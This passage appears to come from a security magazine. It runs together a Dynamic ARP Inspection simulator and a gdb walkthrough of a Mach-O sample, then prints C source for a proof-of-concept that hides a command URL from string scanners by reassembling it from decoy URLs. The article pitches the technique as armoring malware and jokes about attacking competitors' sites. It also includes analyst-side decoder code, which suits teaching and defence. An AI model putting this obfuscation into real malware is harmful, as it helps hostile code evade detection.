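DEFAULT_RATE_LIMIT_PPS = 15  # Cisco default for untrusted interfaces, as stated in the article


@dataclass
class ArpPacket:
    port: str        # ingress interface, e.g. "Fa0/3"
    vlan: int
    sender_ip: str
    sender_mac: str
    t: float         # arrival time in seconds


@dataclass
class DaiSwitch:
    # DHCP snooping binding table keyed (vlan, ip) -> mac; DAI trusts only these pairs
    bindings: dict
    trusted_ports: set = field(default_factory=set)
    rate_limit_pps: int = DEFAULT_RATE_LIMIT_PPS
    errdisabled: set = field(default_factory=set)
    logs: list = field(default_factory=list)
    recent: dict = field(default_factory=lambda: defaultdict(list))

    def inspect(self, pkt: ArpPacket) -> str:
        """Return 'forward' or 'drop' and append syslog-style lines modelled on the screenshots."""
        if pkt.port in self.errdisabled:
            return "drop"                      # port stays down until errdisable recovery
        if pkt.port in self.trusted_ports:
            return "forward"                   # trusted ports bypass every DAI check
        # Rate limit first: count the ARP packets seen on this port in the last second.
        window = [t for t in self.recent[pkt.port] if pkt.t - t < 1.0] + [pkt.t]
        self.recent[pkt.port] = window
        if len(window) > self.rate_limit_pps:
            ms = int(round((window[-1] - window[0]) * 1000))
            self.logs.append(f"%SW_DAI-4-PACKET_RATE_EXCEEDED: {len(window)} packets received "
                             f"in {ms} milliseconds on {pkt.port}")
            self.logs.append(f"%PM-4-ERR_DISABLE: arp-inspection error detected on {pkt.port}, "
                             f"putting {pkt.port} in err-disable state")
            self.errdisabled.add(pkt.port)
            return "drop"
        # Then binding validation: the sender IP/MAC pair must match the snooping table.
        expected = self.bindings.get((pkt.vlan, pkt.sender_ip))
        if expected is None or expected.lower() != pkt.sender_mac.lower():
            self.logs.append(f"%SW_DAI-4-DHCP_SNOOPING_DENY: 1 Invalid ARPs (Req) on {pkt.port}, "
                             f"vlan {pkt.vlan}. ([{pkt.sender_mac}/{pkt.sender_ip}])")
            return "drop"
        return "forward"


def run_demo() -> dict:
    """Replay the article's cases against a constructed binding table."""
    sw = DaiSwitch(
        bindings={(20, "172.16.20.2"): "00:0b:82:1b:a0:7f",   # constructed phone bindings
                  (20, "172.16.20.3"): "00:0b:82:1b:a0:7b"},
        trusted_ports={"Gi0/1"},                               # constructed uplink port
    )
    out = {}
    # 1. A phone answering ARP normally: binding matches, packet is relayed.
    out["legit"] = sw.inspect(ArpPacket("Fa0/1", 20, "172.16.20.2", "00:0B:82:1B:A0:7F", 0.0))
    # 2. Unknown pair arriving on the trusted uplink: no check is applied.
    out["uplink"] = sw.inspect(ArpPacket("Gi0/1", 20, "172.16.20.1", "00:00:5e:00:53:01", 0.1))
    # 3. A single, slow spoofed reply claiming the phone's IP with another MAC.
    out["spoofed"] = sw.inspect(ArpPacket("Fa0/4", 20, "172.16.20.2", "00:0c:29:c2:81:52", 0.2))
    # 4. A host-enumeration burst: 16 packets in ~180 ms from an otherwise valid binding.
    out["burst"] = [sw.inspect(ArpPacket("Fa0/3", 20, "172.16.20.3", "00:0b:82:1b:a0:7b", 1.0 + i * 0.012))
                    for i in range(16)]
    # 5. After err-disable nothing else from that port gets through.
    out["after_errdisable"] = sw.inspect(ArpPacket("Fa0/3", 20, "172.16.20.3", "00:0b:82:1b:a0:7b", 3.0))
    out["errdisabled"] = sorted(sw.errdisabled)
    out["logs"] = list(sw.logs)
    return out


if __name__ == "__main__":
    for line in run_demo()["logs"]:
        print(line)
```

The order of the two checks matters: the burst from a perfectly valid binding is still err-disabled because the rate limit is applied before the binding lookup, while the single spoofed reply never reaches the rate limit and is stopped only by the binding mismatch, which is exactly why the second experiment in the article failed too.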

You can use the errdisable recovery global
configuration command to enable error disable
recovery so that ports automatically emerge from
this state after a specified timeout period. The adjacent
screenshot shows the way you can use the errdisable
recovery cause global configuration command to
enable error-disabled ports after a specified
timeout period.

References

• Dynamic ARP Inspection
• DHCP Snooping
• http://ARPon.sourceforge.net/documentation.html
• http://ARPstar.sf.net

Other Prevention Techniques

Though ARP attacks are dangerous and can
cause dire results, Dynamic ARP Inspection
can easily defeat such attacks and ensure
that our mission-critical communications and
systems are protected.

SOHO administrators can also make
use of open source tools like ArpON
(http://ARPon.sourceforge.net) to protect
their systems from ARP poisoning attacks.

ArpON (ARP handler inspectiON) is a portable
handler daemon with some nice tools to handle all
ARP aspects. It has lots of features and it makes ARP
a bit safer. This is possible using two kinds of anti ARP
poisoning techniques; the first is based on SARPI,
or Static ARP Inspection, the second on the DARPI, or
Dynamic ARP Inspection, approach.

ArpON is not ported to embedded devices like
routers and phones; in fact, it's more of a host based
solution.

Read more about the features of ArpON here (http://
ARPon.sourceforge.net/documentation.html).

Another Linux kernel module, ARP* (ARP Star)
(http://ARPstar.sf.net), can also be used on your
Linux gateway to detect and prevent ARP poisoning
attacks.

This project has been coded in C and is available
as a module for the 2.6 Linux kernel series. The only
libraries needed are included in the Linux kernel. It has
also been ported to the Linksys WRT54G.

I have not played with these tools yet, but down
the line I will surely write on both of them. Till then stay
safe :)
Armoring Malware: Hiding Data within Data

We are receiving malware daily via hundreds of facets that 
the Internet enables with various services; most common 
are via e-mail and web surfing. 



What you will learn...

• You will learn how to armor your malware against simple
attacks to build further.

What you should know...

• Basic understanding of Assembly/C language, debugging and
reverse engineering.



At any one time you can be sitting idly on the 'net
when you are presented with something that
could be malicious either overtly or covertly.
We'll play through the scenario where you've
discovered a binary on your network and are unsure of its
purpose... and then reveal how it was done.

Example Scenario Malware Dissection Workflow

At this point let's agree that we've de-obfuscated the
presented malware binary by unpacking it and are ready
to look for any obvious information that will help us
determine its contents and overall purpose. Also
assume that it will be sandboxed in a virtual machine so
that it does not cause communication or damage to our
network and test machine.

For all intents and purposes we've renamed the binary
blob to the filename secreturl, as we've noticed using
Wireshark (network sniffer) that it is trying to phone
home to a URL that is not known to be on its list for
this variant. We would like to see how it is being hidden
to discover future variants using the same or similar
technique.

Figure 1. Running secreturl binary through strings (terminal screenshot of
strings secreturl; the readable output is http://www.google.com,
http://www.yahoo.com, http://www.apple.com, http://www.microsoft.com,
http://www.blackhat.com, http://www.defcon.org, http://www.israeltorres.org,
http://www.twitter.org and http://www.1234567890.example, plus two further
strings that are unreadable in the scan)

Figure 2. Running secreturl binary through file (terminal screenshot)
    > file secreturl
    secreturl: Mach-O 64-bit executable x86_64

Figure 3. Running secreturl binary through hexdump

Figure 4. Examining secreturl binary in 0xED hex editor (screenshot; the
symbol names readable in the hex view include stack_chk_guard,
dyld_stub_binder, sprintf_chk, stack_chk_fail, strcpy_chk, exit, sscanf,
start, parse_url, main, NXArgc, NXArgv, environ, mh_execute_header and
progname)

Notes

All source code created and tested on:

Mac OS X 10.6.4 [10F569],

GCC 4.2.1 (Apple Inc. build 5646) (dot 1)

GNU gdb 6.3.50-20050815 (Apple version gdb-1346)

We fire up our Mac OS X 10.6.4 virtual machine and
begin our reversing workflow by putting secreturl
through the strings program (Figure 1).

We are presented with 11 easy to read strings, of
which 9 are URLs we are familiar with and at this point
appear to be quite benign. We also notice the remaining
two strings look somewhat familiar but non-threatening
at this time.

Next we use the file program to determine a known
filetype (Figure 2) and find it is being reported
as Mach-O 64-bit executable x86_64. Since we are
running in a Mac OS X virtual machine we will be able to
execute this file if need be, but we still have a few tricks
up our sleeves.

We run hexdump to see what kind of calls the binary
is making and to confirm anything that strings may have
missed in its string parsing: hexdump -C secreturl
(Figure 3). Another great tool to view files in hex is
0xED, so we drop secreturl into 0xED and scroll
through the hex; we confirm the strings (Figure 4) and
also make note of a few function calls: sprintf, strcpy,
sscanf and parse_url. Three of these four look quite
familiar, but what is parse_url? It sounds like it parses
the URL, so we'll find out later.

We feel pretty satisfied with what we've found so
far, so now it is time to run this executable through the
gdb debugger: gdb secreturl. The simplest place to start
is of course main() and we start our disassembly there:
disassemble main (Figure 5). Right away we notice
string references. We need to know what those strings
are, so we select all the terminal text, copy and paste it
to a temporary file called disdump1.txt and use grep
to extract all lines carrying the hash prefix to another file called
strings1.txt with this command: grep '#' disdump1.txt >
strings1.txt (Figure 6). We can certainly do all the
manipulation in a single line of bash, but it is good to
have the workflow in steps and maintain artifacts in a
manageable fashion for later use.

Figure 5. Disassemble secreturl binary with gdb debugger (screenshot of
disassemble main: a long run of rip-relative loads in main, such as
mov 0x869(%rip),%rax # 0x100001010 and mov 0x65c(%rip),%rax # 0x100000e13,
each annotated by gdb with the absolute address referenced)

Figure 6. strings1.txt listing created using grep # (screenshot: the
addresses from those annotations, one per line, starting at 0x100001010
and 0x100000e13 and ending at 0x100000dfa and 0x100001010)

Figure 7. strings1.gdb gdb script file extrapolated from strings1.txt
(screenshot: the same addresses, each prefixed with x/s)

Figure 8. Memory contents revealed using gdb's x/s command

Figure 9. Interesting structure at 0x100000dfa found with x/s (screenshot;
readable output includes "http://www.defcon.org", "ww.defcon.org",
"http://www.twitter.org", "ww.twitter.org",
"http://www.1234567890.example", "ww.1234567890.example" and
"67890.example")

Figure 11. sprintf function call (screenshot of the disassembly in main
leading up to callq <dyld_stub___sprintf_chk>, including
lea 0xc8(%rip),%rcx # 0x100000dfa, mov $0xff,%edx, mov $0x0,%esi and
mov %rbx,%rdi)
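The three manual steps described above (grep the '#'-annotated lines out of the disassembly dump, turn the addresses into an x/s script, read the strings gdb prints) can be scripted end to end. The following is an added example written for this page, not the author's code; the disassembly sample is constructed to match the layout of Figure 5 (each URL is copied to the stack with 8-byte loads, so several references point into the middle of one string, which is what produces the "ww.defcon.org"-style fragments of Figure 9), and the byte image standing in for the process memory gdb would read at 0x100000e13 is constructed as well.

```python
"""Reproduce the gdb string-harvesting workflow from the article as one
script: pull the '# 0x...' operand comments out of a 'disassemble main' dump
(the grep step), emit the x/s commands for them (the strings1.gdb step) and
show what x/s would print against a small constructed image of the binary's
string section. Added illustration; the dump and the image are constructed."""
import re

# Constructed dump modelled on Figure 5; offsets and rip-relative targets are consistent.
SAMPLE_DISASM = """\
Dump of assembler code for function main:
0x0000000100000794 <main+0>:    push   %rbp
0x0000000100000795 <main+1>:    mov    %rsp,%rbp
0x00000001000007a0 <main+12>:   mov    0x869(%rip),%rax        # 0x100001010
0x00000001000007a7 <main+19>:   mov    (%rax),%rdx
0x00000001000007aa <main+22>:   mov    %rdx,-0x18(%rbp)
0x00000001000007ae <main+26>:   xor    %edx,%edx
0x00000001000007b0 <main+28>:   mov    0x65c(%rip),%rax        # 0x100000e13
0x00000001000007b7 <main+35>:   mov    %rax,-0x70(%rbp)
0x00000001000007bb <main+39>:   mov    0x659(%rip),%rax        # 0x100000e1b
0x00000001000007c2 <main+46>:   mov    %rax,-0x68(%rbp)
0x00000001000007c6 <main+50>:   mov    0x657(%rip),%eax        # 0x100000e23
0x00000001000007cc <main+56>:   mov    %eax,-0x60(%rbp)
0x00000001000007cf <main+59>:   movzwl 0x651(%rip),%eax        # 0x100000e27
0x00000001000007d6 <main+66>:   mov    %ax,-0x5c(%rbp)
0x00000001000007da <main+70>:   mov    0x648(%rip),%rax        # 0x100000e29
0x0000000100000d2b <main+1431>: lea    0xc8(%rip),%rcx         # 0x100000dfa
0x0000000100000d4e <main+1466>: mov    0x2bb(%rip),%rdx        # 0x100001010
End of assembler dump.
"""

# Constructed stand-in for the bytes gdb would read from 0x100000e13 onwards:
# NUL-terminated URL literals stored back to back, as the figures suggest.
IMAGE_BASE = 0x100000E13
IMAGE = b"http://www.google.com\0http://www.yahoo.com\0http://www.apple.com\0"

OPERAND_COMMENT = re.compile(r"#\s*(0x[0-9a-fA-F]+)\s*$")


def extract_ref_addresses(disasm: str) -> list:
    """The grep '#' step: every absolute address gdb annotates, in order, without duplicates."""
    found = []
    for line in disasm.splitlines():
        m = OPERAND_COMMENT.search(line)
        if m:
            addr = m.group(1).lower()
            if addr not in found:
                found.append(addr)
    return found


def build_xs_script(addrs: list) -> str:
    """The strings1.gdb step: one x/s per address, usable with 'gdb -x strings1.gdb secreturl'."""
    return "".join(f"x/s {a}\n" for a in addrs)


def read_c_string(image: bytes, base: int, addr: int):
    """What x/s prints: the NUL-terminated string starting at addr, or None if not in the image."""
    off = addr - base
    if off < 0 or off >= len(image):
        return None
    end = image.find(b"\0", off)
    return image[off:end if end >= 0 else len(image)].decode("ascii", errors="replace")


def resolve_strings(disasm: str = SAMPLE_DISASM) -> dict:
    """Run the whole pipeline and map each referenced address to the string found there."""
    return {a: read_c_string(IMAGE, IMAGE_BASE, int(a, 16)) for a in extract_ref_addresses(disasm)}


if __name__ == "__main__":
    print(build_xs_script(extract_ref_addresses(SAMPLE_DISASM)))
    for addr, s in resolve_strings().items():
        print(addr, repr(s))
```

Addresses that fall outside the constructed image (the stack guard at 0x100001010 and the structure at 0x100000dfa) come back as None; against the real process gdb would print whatever lives there, which is the point at which the article turns to the sprintf call.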



...
0x0000000100000cf8 <main+1380>: mov %ecx,0x30(%rsp)
0x0000000100000cfc <main+1384>: mov %esi,0x28(%rsp)
0x0000000100000d00 <main+1388>: mov %edi,0x20(%rsp)
0x0000000100000d04 <main+1392>: mov %r8d,0x18(%rsp)
0x0000000100000d09 <main+1397>: mov %r9d,0x10(%rsp)
0x0000000100000d0e <main+1402>: lea -0x1210(%rbp),%rax
0x0000000100000d15 <main+1409>: mov %rax,0x8(%rsp)
0x0000000100000d1a <main+1414>: lea -0x6e8(%rbp),%rax
0x0000000100000d21 <main+1421>: mov %rax,(%rsp)
0x0000000100000d25 <main+1425>: mov %r10,%r9
0x0000000100000d28 <main+1428>: mov %r11,%r8
0x0000000100000d2b <main+1431>: lea 0xc8(%rip),%rcx   # 0x100000dfa
0x0000000100000d32 <main+1438>: mov $0xff,%edx
0x0000000100000d37 <main+1443>: mov $0x0,%esi
0x0000000100000d3c <main+1448>: mov %rbx,%rdi
0x0000000100000d3f <main+1451>: ...
0x0000000100000d44 <main+1456>: callq 0x100000d6e <dyld_stub___sprintf_chk>
0x0000000100000d49 <main+1461>: mov $0x0,%eax
0x0000000100000d4e <main+1466>: mov 0x2bb(%rip),%rdx   # 0x100001010
0x0000000100000d55 <main+1473>: mov -0x18(%rbp),%rcx
0x0000000100000d59 <main+1477>: xor (%rdx),%rcx
0x0000000100000d5c <main+1480>: je 0x100000d63 <main+1487>
0x0000000100000d5e <main+1482>: callq 0x100000d74 <dyld_stub___stack_chk_fail>
0x0000000100000d63 <main+1487>: add $0x13e8,%rsp
0x0000000100000d6a <main+1494>: pop %rbx
0x0000000100000d6b <main+1495>: leaveq
0x0000000100000d6c <main+1496>: retq
End of assembler dump.
(gdb)

Figure 12. Setting breakpoint after sprintf call
(gdb) info reg
rbx            0x7fff5fbfe650   140734799799888
rdx            0x15             21
r10            0x100000e12      4294970898
r11            0x7fff5fbfe662   140734799799906
rip            0x100000d49      0x100000d49 <main+1461>
eflags         0x202            514
(gdb) x/s 0x7fff5fbfe650
0x7fff5fbfe650:  "http://www.hakin9.org"

Figure 10. Parse_url function called 9 times

Figure 13. Examining memory address 0x7fff5fbfe650



(gdb) x/11s 0x100000e12
0x100000e12:   ""
0x100000e13:   "http://www.google.com"
0x100000e29:   "http://www.yahoo.com"
0x100000e3e:   "http://www.apple.com"
0x100000e53:   "http://www.microsoft.com"
0x100000e6c:   "http://www.blackhat.com"
0x100000e84:   "http://www.defcon.org"
0x100000e9a:   "http://www.israeltorres.org"
0x100000eb6:   "http://www.twitter.org"
0x100000ecd:   "http://www.1234567890.example"
(gdb)

Figure 14. Url list contained at 0x100000e12

findsecreturl.gdb:

    disassemble main
    break *0x0000000100000d49
    r
    info reg
    x/s 0x7fff5fbfe650
    x/11s 0x100000e12

Figure 15. Findsecreturl gdb command listing batch script



We now want to extract and modify the strings1.txt text file into a simple gdb script file so we can have gdb do all the dirty work in batch and not in a tedious manual fashion, using the command: cat strings1.txt | cut -d '#' -f 2 | sed 's/ /x\/s /g' > strings1.gdb (Figure 7)

As part of the output we've prefixed x/s to each line to examine memory strings and give us a readable set of results. We can now run this gdb script using the following command: gdb secreturl -x strings1.gdb (Figure 8) and immediately see the interpreted results of the memory contents. At this point everything matches what we've expected, and now (Figure 9) we see where 0x100000dfa: "%s%s%s%s%c%c%c%c%c%c%s%s" (previously noted from the strings dump) fits into the picture (literally). We'll note it as some type of specifier until we see more of what's going on.

Now that we're satisfied with what the string references revealed, let's examine the main() disassembly further. Scrolling down our disassembly dump we see calls to parse_url(): callq 0x10000067c <parse_url> (Figure 10); in fact there are 9 of these calls out of the 11 total calls in main(). Currently parse_url() isn't interesting enough to disassemble, but we'll remember to backtrack to this function if necessary. As we continue, the second to last call is to sprintf() (Figure 11); prior to this call, at 0x100000dfa,



secreturl.c

// secreturl.c v1.0 Armoring Malware Point of Concept (PoC) by Israel Torres hakin9@israeltorres.org
#include <stdio.h>
#include <string.h>

#define MX_B0 100
#define MX_B1 4
#define MX_B2 100
#define MX_B3 2
#define MX_B4 100
#define MX_B5 2
#define MX_B6 100
#define MX_UR 255

// Parse URL into reusable blocks
void parse_url(char url[], char blk0[], char blk1[], char blk2[], char blk3[], char blk4[], char blk5[], char blk6[]){
    // the separators are constant, so they are written straight into the grid
    strcpy(blk1, "://"); strcpy(blk3, "."); strcpy(blk5, ".");
    // scheme, host label, second-level label and the rest of the name
    sscanf(url, "%99[^:]://%99[^.].%99[^.].%99[^\n]", blk0, blk2, blk4, blk6);
}

// Start Here
int main()
{   // Arbitrary Target Site Deception List
    char arbA[]="http://www.google.com";
    char arbB[]="http://www.yahoo.com";
    char arbC[]="http://www.apple.com";
    char arbD[]="http://www.microsoft.com";
    char arbE[]="http://www.blackhat.com";
    char arbF[]="http://www.defcon.org";
    char arbG[]="http://www.israeltorres.org";
    char arbH[]="http://www.twitter.org";
    char arbI[]="http://www.1234567890.example";
    // Create Grid (rows A-I, columns 0-6)
    char blk0_A[MX_B0], blk0_B[MX_B0], blk0_C[MX_B0], blk0_D[MX_B0], blk0_E[MX_B0], blk0_F[MX_B0], blk0_G[MX_B0], blk0_H[MX_B0], blk0_I[MX_B0];
    char blk1_A[MX_B1], blk1_B[MX_B1], blk1_C[MX_B1], blk1_D[MX_B1], blk1_E[MX_B1], blk1_F[MX_B1], blk1_G[MX_B1], blk1_H[MX_B1], blk1_I[MX_B1];
    char blk2_A[MX_B2], blk2_B[MX_B2], blk2_C[MX_B2], blk2_D[MX_B2], blk2_E[MX_B2], blk2_F[MX_B2], blk2_G[MX_B2], blk2_H[MX_B2], blk2_I[MX_B2];
    char blk3_A[MX_B3], blk3_B[MX_B3], blk3_C[MX_B3], blk3_D[MX_B3], blk3_E[MX_B3], blk3_F[MX_B3], blk3_G[MX_B3], blk3_H[MX_B3], blk3_I[MX_B3];
    char blk4_A[MX_B4], blk4_B[MX_B4], blk4_C[MX_B4], blk4_D[MX_B4], blk4_E[MX_B4], blk4_F[MX_B4], blk4_G[MX_B4], blk4_H[MX_B4], blk4_I[MX_B4];
    char blk5_A[MX_B5], blk5_B[MX_B5], blk5_C[MX_B5], blk5_D[MX_B5], blk5_E[MX_B5], blk5_F[MX_B5], blk5_G[MX_B5], blk5_H[MX_B5], blk5_I[MX_B5];
    char blk6_A[MX_B6], blk6_B[MX_B6], blk6_C[MX_B6], blk6_D[MX_B6], blk6_E[MX_B6], blk6_F[MX_B6], blk6_G[MX_B6], blk6_H[MX_B6], blk6_I[MX_B6];
    // Parse List and Populate Grid
    parse_url(arbA, blk0_A, blk1_A, blk2_A, blk3_A, blk4_A, blk5_A, blk6_A);
    parse_url(arbB, blk0_B, blk1_B, blk2_B, blk3_B, blk4_B, blk5_B, blk6_B);
    parse_url(arbC, blk0_C, blk1_C, blk2_C, blk3_C, blk4_C, blk5_C, blk6_C);
    parse_url(arbD, blk0_D, blk1_D, blk2_D, blk3_D, blk4_D, blk5_D, blk6_D);
    parse_url(arbE, blk0_E, blk1_E, blk2_E, blk3_E, blk4_E, blk5_E, blk6_E);
    parse_url(arbF, blk0_F, blk1_F, blk2_F, blk3_F, blk4_F, blk5_F, blk6_F);
    parse_url(arbG, blk0_G, blk1_G, blk2_G, blk3_G, blk4_G, blk5_G, blk6_G);
    parse_url(arbH, blk0_H, blk1_H, blk2_H, blk3_H, blk4_H, blk5_H, blk6_H);
    parse_url(arbI, blk0_I, blk1_I, blk2_I, blk3_I, blk4_I, blk5_I, blk6_I);
    // Reuse Grid Content to Recombine Secret URL
    char secret_url[MX_UR];
    sprintf(secret_url, "%s%s%s%s%c%c%c%c%c%c%s%s",
            blk0_A, blk1_G, blk2_D, blk3_B, blk4_E[5], blk4_C[0], blk4_E[4],
            blk4_G[0], blk4_F[5], blk4_I[8], blk5_H, blk6_F);
    //printf("%s\n", secret_url); // prints http://www.hakin9.org
    return 0;
}

Figure 16. Secreturl C source listing
IPObscure.txt

IPObscure - IP Obscurity Tool v1.6.2
http://tools.israeltorres.org
usage:

IPObscure.exe [command[n]] [ip|host]

commands: ( append "n" to the command for new line in output )

 -dip   convert IP to dotless [192.0.34.166] -> [3221234342]
 -hip   convert IP to hex     [192.0.34.166] -> [0xC00022A6]
 -hip2  convert IP to hex     [192.0.34.166] -> [C00022A6]
 -hip3  convert IP to hex     [192.0.34.166] -> [0xC0.0x00.0x22.0xA6]
 -oip   convert IP to octal   [192.0.34.166] -> [0300.000.042.0246]
 -oip2  convert IP to octal   [192.0.34.166] -> [030000021246]

Figure 17. IPObscure example



secreturl url list1 - plain.txt

http://www.google.com
http://www.yahoo.com
http://www.apple.com
http://www.microsoft.com
http://www.blackhat.com
http://www.defcon.org
http://www.israeltorres.org
http://www.twitter.org
http://www.1234567890.example

Figure 18. Secreturl url list1 - plain
secreturl url list2 - parsed urls.txt

    [0]   [1]  [2]  [3]  [4]           [5]  [6]
A   http  ://  www  .    google        .    com
B   http  ://  www  .    yahoo         .    com
C   http  ://  www  .    apple         .    com
D   http  ://  www  .    microsoft     .    com
E   http  ://  www  .    blackhat      .    com
F   http  ://  www  .    defcon        .    org
G   http  ://  www  .    israeltorres  .    org
H   http  ://  www  .    twitter       .    org
I   http  ://  www  .    1234567890    .    example

Figure 19. Secreturl url list2 - parsed urls
is our string-character specifier. We're interested in knowing what populates the specifier string, and using the debugger we can find out. The simplest way is to set a breakpoint immediately after the call to sprintf():

0x0000000100000d44 <main+1456>: callq 0x100000d6e <dyld_stub___sprintf_chk>

(Figure 12) which is

0x0000000100000d49 <main+1461>: mov $0x0,%eax

In our gdb session we type in: break *0x0000000100000d49 and type in r to run. The executable runs and hits the breakpoint we set: Breakpoint 1, 0x0000000100000d49 in main(); this means our registers of interest are at the point we want them and we can now interrogate them further using the info reg gdb command (Figure 13). We start with rbx:

rbx 0x7fff5fbfe650 140734799799888



secreturl url list3 - recombining secret url.txt

http   ://    www    .      h      a      k      i      n      9      .      org
[0]A0  [1]G0  [2]D0  [3]B0  [4]E5  [4]C0  [4]E4  [4]G0  [4]F5  [4]I8  [5]H0  [6]F0
1      2      3      4      5      6      7      8      9      10     11     12

Figure 20. Secreturl url list3 - recombining secret url

secreturl url list4 - mapping variants.txt

[0]A0 [1]G0 [2]D0 [3]B0 [4]E5 [4]C0 [4]E4 [4]G0 [4]F5 [4]I8 [5]H0 [6]F0

0A01G02D03B04E54C04E44G04F54I85H06F0

[0]A0
[1]G0
[2]D0
[3]B0
[4]E5
[4]C0
[4]E4
[4]G0
[4]F5
[4]I8
[5]H0
[6]F0

0A0
1G0
2D0
3B0
4E5
4C0
4E4
4G0
4F5
4I8
5H0
6F0

Figure 21. Secreturl url list4 - mapping variants
and to examine its content use x/s:

x/s 0x7fff5fbfe650

which returns:

0x7fff5fbfe650: "http://www.hakin9.org"

To quote Archimedes: Eureka - we've found it! Our secret url is http://www.hakin9.org (I always suspected something was up with those guys ;). In r10 there is 0x100000e12, which when examined with x/11s 0x100000e12 reveals our original url list (Figure 14) - but it is still missing hakin9.org (the secret url). This means a scanner looking for url strings won't find it unless it runs the binary in memory first (like we did with gdb). Creating a simple gdb script called findsecreturl.gdb, we can now play this artifact back at any time (Figure 15).

We could now further analyze the rest of the functions and eventually put together how we are hiding the secret url, but we will leave that up to you. ;p

Example Malware Creation Concept

Spoiler Alert: here's the source created for this exercise that reuses and reassembles something from nothing (Figure 16). Compile with: gcc -o secreturl secreturl.c

We start at the source by making sure our arbitrary list contains all the characters we need for our secret url(s). Randomly picking them from history helps make them appear more benign - note they don't need to be limited to domain names only; greater schemes can contain full path names, etc. (Figure 18)

As suspected, the parse_url function parsed the urls so that when passed in they would appear logically as this tab-delimited table shows (cleaned up for readability). Notice the A-I alphabetical listing per URL (row) and the zero-based columns that separate common chunks of data - added complexity could include different protocols, separator units and data compression. The diversion here is to be able to connect to different parts of the data points so that we don't leave an easy-to-follow trail (for example if we always referenced http from column 0 row A...); we have open choices, and could even construct this string using the same technique we did for the domain name in the secret url (Figure 19).

We further demonstrate how we reference the rows and columns to graph out the secret url; for consistency we tokenize 0 for strings so they keep the same length when compared to the individual characters; for further obfuscation they could contain pseudo-random characters, as they get stripped off anyway and only complicate analysis (Figure 20).

We could add variants when it comes to sending a message to the malware to update its secret urls by sending it a new data map instruction set (Figure 21).

Even further obfuscation could include using functions like IPObscure to obscure how the IP address is translated (hex, octal, dotless decimal).
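An added analyst-side example (not code from the article or from secreturl.c): given the decoy list recovered in Figure 14, the sprintf() format string found at 0x100000dfa and the index map in either the Figure 20 or the Figure 21 notation, it rebuilds the string the binary only ever assembles in memory, so the hidden URL can be confirmed and added to blocklists without executing the sample. It assumes the map grammar is one column digit, one row letter and one index digit per token, as the figures show, and splits URLs the way parse_url()'s sscanf pattern does.

```python
"""Static decoder for the secreturl "ransom-note" URL mapping (added example)."""
import re
from typing import List, Tuple

# Constructed inputs, copied from the article's figures: the decoy URL list
# recovered at 0x100000e12 (Figure 14), the sprintf() format string found at
# 0x100000dfa (Figure 9) and the index map in both notations (Figures 20, 21).
URL_LIST = [
    "http://www.google.com",
    "http://www.yahoo.com",
    "http://www.apple.com",
    "http://www.microsoft.com",
    "http://www.blackhat.com",
    "http://www.defcon.org",
    "http://www.israeltorres.org",
    "http://www.twitter.org",
    "http://www.1234567890.example",
]
SPRINTF_FORMAT = "%s%s%s%s%c%c%c%c%c%c%s%s"
MAP_SPACED = "[0]A0 [1]G0 [2]D0 [3]B0 [4]E5 [4]C0 [4]E4 [4]G0 [4]F5 [4]I8 [5]H0 [6]F0"
MAP_PACKED = "0A01G02D03B04E54C04E44G04F54I85H06F0"

# Same split as parse_url()'s sscanf pattern "%99[^:]://%99[^.].%99[^.].%99[^\n]";
# the separators "://", "." and "." become the fixed columns 1, 3 and 5.
_URL_RE = re.compile(r"([^:]+)://([^.]+)\.([^.]+)\.(.*)")
# One map token is a column digit, a row letter and an index digit. The
# brackets are optional, so the one pattern reads both the spaced and the
# packed notation (assumed grammar, matching what Figures 20 and 21 show).
_TOKEN_RE = re.compile(r"\[?(\d)\]?([A-Z])(\d)")


def parse_url_blocks(url: str) -> List[str]:
    """Turn one decoy URL into the 7-column grid row secreturl.c builds."""
    m = _URL_RE.fullmatch(url)
    if m is None:
        raise ValueError(f"URL does not fit the parse_url() pattern: {url!r}")
    scheme, host_label, second_label, rest = m.groups()
    return [scheme, "://", host_label, ".", second_label, ".", rest]


def parse_map(map_text: str) -> List[Tuple[int, int, int]]:
    """Return (column, row, index) triples with the row 0-based (A=0, B=1, ...)."""
    triples = [(int(col), ord(row) - ord("A"), int(idx))
               for col, row, idx in _TOKEN_RE.findall(map_text)]
    if not triples:
        raise ValueError("no map tokens found")
    return triples


def recombine(urls: List[str], fmt: str, map_text: str) -> str:
    """Rebuild the string sprintf() would assemble, without running the sample.

    The format string decides how each map token is consumed: a %s takes the
    whole block (its index digit is the 0 placeholder the article describes and
    is ignored), a %c takes the single character at that index.
    """
    grid = [parse_url_blocks(u) for u in urls]
    conversions = re.findall(r"%(\w)", fmt)
    tokens = parse_map(map_text)
    if len(conversions) != len(tokens):
        raise ValueError(f"format has {len(conversions)} conversions, "
                         f"map has {len(tokens)} tokens")
    pieces = []
    for conv, (col, row, idx) in zip(conversions, tokens):
        block = grid[row][col]
        if conv == "s":
            pieces.append(block)
        elif conv == "c":
            pieces.append(block[idx])
        else:
            raise ValueError(f"unsupported conversion %{conv}")
    return "".join(pieces)


def visible_at_rest(urls: List[str], needle: str) -> bool:
    """True if a plain string scan of the decoy list alone would find needle.

    This is the article's point: the recombined URL is not in the list, so a
    scanner that only looks at strings at rest never sees it.
    """
    return any(needle in u for u in urls)


if __name__ == "__main__":
    secret = recombine(URL_LIST, SPRINTF_FORMAT, MAP_SPACED)
    print(secret)  # http://www.hakin9.org
    print("packed notation agrees:",
          recombine(URL_LIST, SPRINTF_FORMAT, MAP_PACKED) == secret)
    print("hakin9 visible in list at rest:", visible_at_rest(URL_LIST, "hakin9"))
```

A mismatch between the number of conversions in the format string and the number of map tokens is treated as an error, since that is the first sign the recovered map belongs to a different build of the sample.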

Conclusion

As you see it doesn't matter that the listed sites are taken down/sinkholed; they are pretty much arbitrary, as their primary objective (while at rest) is to contain the necessary characters to be reused to recombine a new secret URL using this type of ransom-note style mapping technique. This protects the secret url from being discovered until an update is required and the process updates its mapping. The secondary objective is to serve as a distraction. The tertiary objective is to have fun taking down competitors'/opponents' sites. ;)
Is Anti-virus Dead

The answer is YES. Here's why...



There have been billions of dollars in damages caused by exploiters on the Internet. These exploiters are intelligent cyber terrorists, criminals and hackers who have a plethora of tools available in their war chest - ranging from spyware, rootkits, trojans, viruses, worms, zombies and botnets to various other blended threats. From old viruses to these new botnets, we can categorize them all as malware.




What you will learn... 

• The Laws of Malware 

• Proactive Defenses against Zero-day Malware 



What you should know... 

• Scanning for Vulnerabilities 

• How to run a Virus Scanner 



To cope with this cyber mess, we must first understand it. How does malware function? How is it designed? After years of cybercrime research and testing destructive malware I've discovered the commonalities among all of these horrible pieces of code - I call my discovery The Laws of Malware.

Before I get into these laws, let me give you some 
shocking recent statistics on Malware. 

